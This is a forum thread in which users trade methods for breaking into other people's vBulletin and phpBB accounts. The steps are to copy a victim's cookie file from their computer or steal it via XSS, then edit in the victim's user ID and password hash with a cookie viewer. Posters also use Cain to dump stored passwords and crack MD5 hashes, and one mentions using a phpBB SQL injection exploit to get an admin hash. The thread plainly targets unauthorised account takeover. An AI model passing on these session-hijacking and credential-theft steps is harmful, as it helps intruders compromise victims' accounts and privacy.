I am wondering, where are passwords for some board contained? VBulletin to be precised... They are not in the protected storage, so they must be in cookie or something.. Now, if I have access to someone computer, how would I transfer his cookie to my mashine in orther to get his username and password of that forum?? Or, how do I get in the forum using his cookies, then maybe I don't even have to know what is password?

Download cain. Firs thing it shows are all the stored passes in autocomplete
next tab, press + for default pass, connection pass etc

Yes, but I said Prot. storage doesnt show anything.. And I don't wish to use keylogger..
I am specifically interested how to use his cookies on my comp..

the cookie file would be called somthing like "username@site.com" in ur cookies directory - C:\Documents and Settings\username\Cookies

1. Get an app that can modify cookies
this is a nice free one but there are probly many others
http://members.lycos.co.uk/nirsoft1/utils/iecookies.html

2. copy the cookie file from victims computer (or use XSS)

3. change the username to urs (i think that should work) or
can modify ur own cookie (assuming u have logged in to the site)
simply substitute ur username, id and password hash for the ones contained in the other cookie file u have "aquired" - this method has been tested on invision, xmbforum and phpbb so VBulletin should be no different

Note:
if u have grabbed someone elses cookie it may have expired, but that is no problem cause u can change the expiration date as well from that nirsoft app


a cookie file could also be stolen using cross site scripting (XSS), eg:

It won't work.. I don't know why.. I logged in with my username.. There was cookie created.. So without logging out, I modifyed my cookie, changed userID and Password.. Then I saved it and clicked refresh... Nothin.. I was still logged in, but with my username.. SO I checked cookie again to see if refresh have maybe returned old values(my userID), but no.. There was fakeID in there.. Then I logged out, and copyed modifyed cookie again, then retuned to site, but it said Please login..
I don't get it.. It seems like script is not reading my details from cookie at all..

in IEcookiesview right click on the modified cookie and click "open web site"
also check if there r other values vbulltin has that u can substitute in (if any) and that the expiration date/time is greater than todays date/time

I will try it next time..
Now I just fired MD5 crack, and cracked the hash...
The irony was that I had to do it twice since my sister turned off my computer on 99% finished.. Don't you wanna kill them sometimes

is there some howto on how to do this i used the latest Phpbb 2.0.8 Sql Injection Exploit to get a hash form a phpbb foum but the hash is pretty secure ive been trying to crack it for about ahh 15 hrs with mdcrack so im looking at trying to edit a cookie of my own..i have the admin user name and also the hash